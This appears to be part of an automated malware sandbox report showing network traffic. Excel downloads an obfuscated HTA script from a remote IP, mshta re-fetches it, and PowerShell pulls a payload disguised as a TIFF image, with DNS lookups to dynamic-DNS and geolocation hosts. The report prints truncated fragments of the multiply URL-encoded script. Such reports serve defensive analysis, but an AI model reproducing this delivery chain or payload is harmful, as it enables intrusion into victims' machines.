                                                                                                                                                                              Oct 14, 2024 11:05:44.738820076 CEST5291753192.168.2.228.8.8.8
                                                                                                                                                                              Oct 14, 2024 11:05:44.763202906 CEST53529178.8.8.8192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:03.208472967 CEST6275153192.168.2.228.8.8.8
                                                                                                                                                                              Oct 14, 2024 11:06:03.214960098 CEST53627518.8.8.8192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:05.140263081 CEST5789353192.168.2.228.8.8.8
                                                                                                                                                                              Oct 14, 2024 11:06:05.151715994 CEST53578938.8.8.8192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:11.541066885 CEST5482153192.168.2.228.8.8.8
                                                                                                                                                                              Oct 14, 2024 11:06:12.540038109 CEST5482153192.168.2.228.8.8.8
                                                                                                                                                                              Oct 14, 2024 11:06:12.640465975 CEST53548218.8.8.8192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:12.647614956 CEST53548218.8.8.8192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:14.049437046 CEST5471953192.168.2.228.8.8.8
                                                                                                                                                                              Oct 14, 2024 11:06:14.058613062 CEST53547198.8.8.8192.168.2.22
                                                                                                                                                                              Oct 14, 2024 11:06:19.415242910 CEST4988153192.168.2.228.8.8.8
                                                                                                                                                                              Oct 14, 2024 11:06:19.421860933 CEST53498818.8.8.8192.168.2.22

                                                                                                                                                                              ICMP Packets

                                                                                                                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                              Oct 14, 2024 11:06:12.647938013 CEST192.168.2.228.8.8.8d017(Port unreachable)Destination Unreachable

                                                                                                                                                                              DNS Queries

                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                              Oct 14, 2024 11:05:42.872838020 CEST192.168.2.228.8.8.80xa666Standard query (0)jfm.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:05:44.738820076 CEST192.168.2.228.8.8.80xcf72Standard query (0)jfm.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:03.208472967 CEST192.168.2.228.8.8.80x27a3Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:05.140263081 CEST192.168.2.228.8.8.80xe1f8Standard query (0)jfm.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:11.541066885 CEST192.168.2.228.8.8.80x5aa8Standard query (0)idabo.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:12.540038109 CEST192.168.2.228.8.8.80x5aa8Standard query (0)idabo.duckdns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:14.049437046 CEST192.168.2.228.8.8.80x8af7Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:19.415242910 CEST192.168.2.228.8.8.80xd2e4Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

                                                                                                                                                                              DNS Answers

                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                              Oct 14, 2024 11:05:42.884692907 CEST8.8.8.8192.168.2.220xa666No error (0)jfm.com.co150.136.81.248A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:05:44.763202906 CEST8.8.8.8192.168.2.220xcf72No error (0)jfm.com.co150.136.81.248A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:03.214960098 CEST8.8.8.8192.168.2.220x27a3No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:03.214960098 CEST8.8.8.8192.168.2.220x27a3No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:03.214960098 CEST8.8.8.8192.168.2.220x27a3No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:03.214960098 CEST8.8.8.8192.168.2.220x27a3No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:05.151715994 CEST8.8.8.8192.168.2.220xe1f8No error (0)jfm.com.co150.136.81.248A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:12.640465975 CEST8.8.8.8192.168.2.220x5aa8No error (0)idabo.duckdns.org135.148.195.248A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:12.647614956 CEST8.8.8.8192.168.2.220x5aa8No error (0)idabo.duckdns.org135.148.195.248A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:14.058613062 CEST8.8.8.8192.168.2.220x8af7No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:19.421860933 CEST8.8.8.8192.168.2.220xd2e4No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:19.421860933 CEST8.8.8.8192.168.2.220xd2e4No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:19.421860933 CEST8.8.8.8192.168.2.220xd2e4No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                              Oct 14, 2024 11:06:19.421860933 CEST8.8.8.8192.168.2.220xd2e4No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false

                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                              • jfm.com.co
                                                                                                                                                                              • raw.githubusercontent.com
                                                                                                                                                                              • 192.3.220.40
                                                                                                                                                                              • geoplugin.net

                                                                                                                                                                              HTTP Packets

                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              0192.168.2.2249162192.3.220.40803184C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 14, 2024 11:05:43.592744112 CEST366OUTGET /450/ec/networkthinkinggreatthingstobeenough.hta HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                              Host: 192.3.220.40
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Oct 14, 2024 11:05:44.110711098 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:05:44 GMT
                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                              Last-Modified: Mon, 14 Oct 2024 05:15:53 GMT
                                                                                                                                                                              ETag: "28fda-62468ee52a080"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Length: 167898
                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/hta
                                                                                                                                                                              Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 22 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 33 45 6d 25 32 35 33 44 25 32 35 32 37 25 32 35 32 35 33 43 73 63 72 69 70 74 25 32 35 32 35 32 30 6c 61 6e 67 75 61 67 65 25 32 35 32 35 33 44 4a 61 76 61 53 63 72 69 70 74 25 32 35 32 35 33 45 6d 25 32 35 32 35 33 44 25 32 35 32 35 32 37 25 32 35 32 35 32 35 33 43 25 32 35 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 32 35 33 45 25 32 35 32 35 32 35 30 41 25 32 35 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 32 35 33 44 25 32 35 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <script>...document.write(unescape("%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253C%25252521DOCTYPE%25252520html%2525253E%2525250A%2525253Cmeta%25252520http-equiv%2525253D%25252522X-UA-Compatible%25252522%25252520content%2525253D%25252522IE%2525253DEmulateIE8%25252522%25252520%2525253E%2525250A%2525253Chtml%2525253E%2525250A%2525253Cbody%2525253E%2525250A%2525253CScriPt%25252520LaNGUaGe%2525253D%25252522VbsCripT%25252522%2525253E%2525250Adim%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%
                                                                                                                                                                              Oct 14, 2024 11:05:44.110760927 CEST224INData Raw: 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32
                                                                                                                                                                              Data Ascii: 25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
                                                                                                                                                                              Oct 14, 2024 11:05:44.110820055 CEST1236INData Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25
                                                                                                                                                                              Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
                                                                                                                                                                              Oct 14, 2024 11:05:44.110856056 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                              Data Ascii: 252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25
                                                                                                                                                                              Oct 14, 2024 11:05:44.110892057 CEST1236INData Raw: 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39
                                                                                                                                                                              Data Ascii: 9%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525250
                                                                                                                                                                              Oct 14, 2024 11:05:44.110927105 CEST1236INData Raw: 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35
                                                                                                                                                                              Data Ascii: 5252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2
                                                                                                                                                                              Oct 14, 2024 11:05:44.110960960 CEST896INData Raw: 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32
                                                                                                                                                                              Data Ascii: 2509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525252C%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525
                                                                                                                                                                              Oct 14, 2024 11:05:44.110996962 CEST1236INData Raw: 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32
                                                                                                                                                                              Data Ascii: 25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%
                                                                                                                                                                              Oct 14, 2024 11:05:44.111031055 CEST1236INData Raw: 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35
                                                                                                                                                                              Data Ascii: 52509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252
                                                                                                                                                                              Oct 14, 2024 11:05:44.111068964 CEST1236INData Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25
                                                                                                                                                                              Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
                                                                                                                                                                              Oct 14, 2024 11:05:44.116242886 CEST1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32
                                                                                                                                                                              Data Ascii: 252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              1192.168.2.2249164192.3.220.40803456C:\Windows\System32\mshta.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 14, 2024 11:05:45.838871956 CEST443OUTGET /450/ec/networkthinkinggreatthingstobeenough.hta HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Accept-Language: fr-FR
                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                              Range: bytes=8896-
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Host: 192.3.220.40
                                                                                                                                                                              If-Range: "28fda-62468ee52a080"
                                                                                                                                                                              Oct 14, 2024 11:05:46.327862978 CEST1236INHTTP/1.1 206 Partial Content
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:05:46 GMT
                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                              Last-Modified: Mon, 14 Oct 2024 05:15:53 GMT
                                                                                                                                                                              ETag: "28fda-62468ee52a080"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Length: 159002
                                                                                                                                                                              Content-Range: bytes 8896-167897/167898
                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/hta
                                                                                                                                                                              Data Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 65 4a 44 42 49 71 46 49 4a 71 4f 59 45 6f 61 6a 45 4e 79 70 56 63 67 66 42 6f 74 52 64 4b 6c 68 53 73 75 71 75 52 61 4b 58 72 6a 75 41 64 68 6e 51 4e 42 63 53 41 4f 58 79 57 5a 6b 6d 72 58 66 45 78 70 69 6e 69 6a 46 54 49 55 64 54 4b 59 43 47 6c 76 43 52 67 6d 47 6b 79 6b 63 6e 48 54 4c 44 64 51 77 63 59 6b 6f 4c 78 7a 77 7a 53 41 59 71 70 4a 6b 48 43 43 63 5a 63 43 4e 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 [TRUNCATED]
                                                                                                                                                                              Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509eJDBIqFIJqOYEoajENypVcgfBotRdKlhSsuquRaKXrjuAdhnQNBcSAOXyWZkmrXfExpinijFTIUdTKYCGlvCRgmGkykcnHTLDdQwcYkoLxzwzSAYqpJkHCCcZcCN%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509
                                                                                                                                                                              Oct 14, 2024 11:05:46.327888012 CEST224INData Raw: 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25
                                                                                                                                                                              Data Ascii: %25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525250
                                                                                                                                                                              Oct 14, 2024 11:05:46.327930927 CEST1236INData Raw: 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39
                                                                                                                                                                              Data Ascii: 9%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525250
                                                                                                                                                                              Oct 14, 2024 11:05:46.327941895 CEST1236INData Raw: 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35
                                                                                                                                                                              Data Ascii: 5252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2
                                                                                                                                                                              Oct 14, 2024 11:05:46.327953100 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32
                                                                                                                                                                              Data Ascii: 2509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525
                                                                                                                                                                              Oct 14, 2024 11:05:46.327991009 CEST1236INData Raw: 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39
                                                                                                                                                                              Data Ascii: 9%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525250
                                                                                                                                                                              Oct 14, 2024 11:05:46.328002930 CEST1236INData Raw: 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39
                                                                                                                                                                              Data Ascii: 9%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2525250
                                                                                                                                                                              Oct 14, 2024 11:05:46.328016996 CEST1236INData Raw: 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35
                                                                                                                                                                              Data Ascii: 5252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2
                                                                                                                                                                              Oct 14, 2024 11:05:46.328080893 CEST1236INData Raw: 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 6b 69 4f 6a 65 6b 57 67 6d 64 43 4f 5a 53 6c 58 6f 55 4e 4b 6b 51 61 63 63 58 54 56 70 52 41 74 67 65 55 62 57 79 45 51 73 6a
                                                                                                                                                                              Data Ascii: 2509%25252509%25252509%25252509%25252509kiOjekWgmdCOZSlXoUNKkQaccXTVpRAtgeUbWyEQsjLQrApGyEKJPBxZALjgluavqyWtDIJteOJKtnrIRdEfpNFbWPQHzgmCCXWfnYNmiAyrwmTyhYxTZIZCgSOt%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%252525
                                                                                                                                                                              Oct 14, 2024 11:05:46.328093052 CEST1000INData Raw: 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32
                                                                                                                                                                              Data Ascii: 25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%
                                                                                                                                                                              Oct 14, 2024 11:05:46.332935095 CEST1236INData Raw: 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35 32 35 32 35 30 39 25 32 35
                                                                                                                                                                              Data Ascii: 5252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%25252509%2


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.2249165192.3.220.40803556C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Oct 14, 2024 11:05:54.997355938 CEST359OUTGET /450/seethebestpricewithgoodcookiesme.tIF HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                              Host: 192.3.220.40
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Oct 14, 2024 11:05:55.479284048 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 14 Oct 2024 09:05:55 GMT
                                                                                                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                              Last-Modified: Mon, 14 Oct 2024 05:12:43 GMT
                                                                                                                                                                              ETag: "2fcf0-62468e2fb0efb"
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              Content-Length: 195824
                                                                                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: image/tiff
